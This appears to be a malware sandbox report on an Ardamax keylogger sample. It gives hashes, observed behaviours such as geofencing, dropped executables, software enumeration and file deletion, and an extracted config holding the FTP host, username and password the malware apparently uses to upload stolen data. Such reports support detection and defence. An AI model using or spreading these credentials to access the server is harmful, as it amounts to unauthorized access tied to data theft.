General

  • Target

    d2d065a3a3af267094c0a1a628284090_JaffaCakes118

  • Size

    264KB

  • Sample

    241207-rchg4szlcp

  • MD5

    d2d065a3a3af267094c0a1a628284090

  • SHA1

    df6a3afe19193c074df0aced10e7e3be405d4ce0

  • SHA256

    d9d714f69e5da9beb4d44b2ec26d57abf654e03c562bbc18a1ca06272a9cb570

  • SHA512

    3e29247b30f2b2c912e199e07c8379f4652d7818741d582531316a83c1ea3a9e19bbc6cf40913e4bb57501b6a182eb7f5895d925fc9d48b984ea510f7227a558

  • SSDEEP

    6144:AmpyGgro0YEApz1Tu80xC19YrNJzH/AchAmJsqzcQQMxLXk4h:Av2EahTu86CUr/eKTcQrXBh

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.lua.pl
  • Port:
    21
  • Username:
    mhhm
  • Password:
    lukasz50

Targets

    • Target

      d2d065a3a3af267094c0a1a628284090_JaffaCakes118

    • Size

      264KB

    • MD5

      d2d065a3a3af267094c0a1a628284090

    • SHA1

      df6a3afe19193c074df0aced10e7e3be405d4ce0

    • SHA256

      d9d714f69e5da9beb4d44b2ec26d57abf654e03c562bbc18a1ca06272a9cb570

    • SHA512

      3e29247b30f2b2c912e199e07c8379f4652d7818741d582531316a83c1ea3a9e19bbc6cf40913e4bb57501b6a182eb7f5895d925fc9d48b984ea510f7227a558

    • SSDEEP

      6144:AmpyGgro0YEApz1Tu80xC19YrNJzH/AchAmJsqzcQQMxLXk4h:Av2EahTu86CUr/eKTcQrXBh

    • Ardamax

      A keylogger first seen in 2013.

    • Ardamax family

    • Ardamax main executable

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.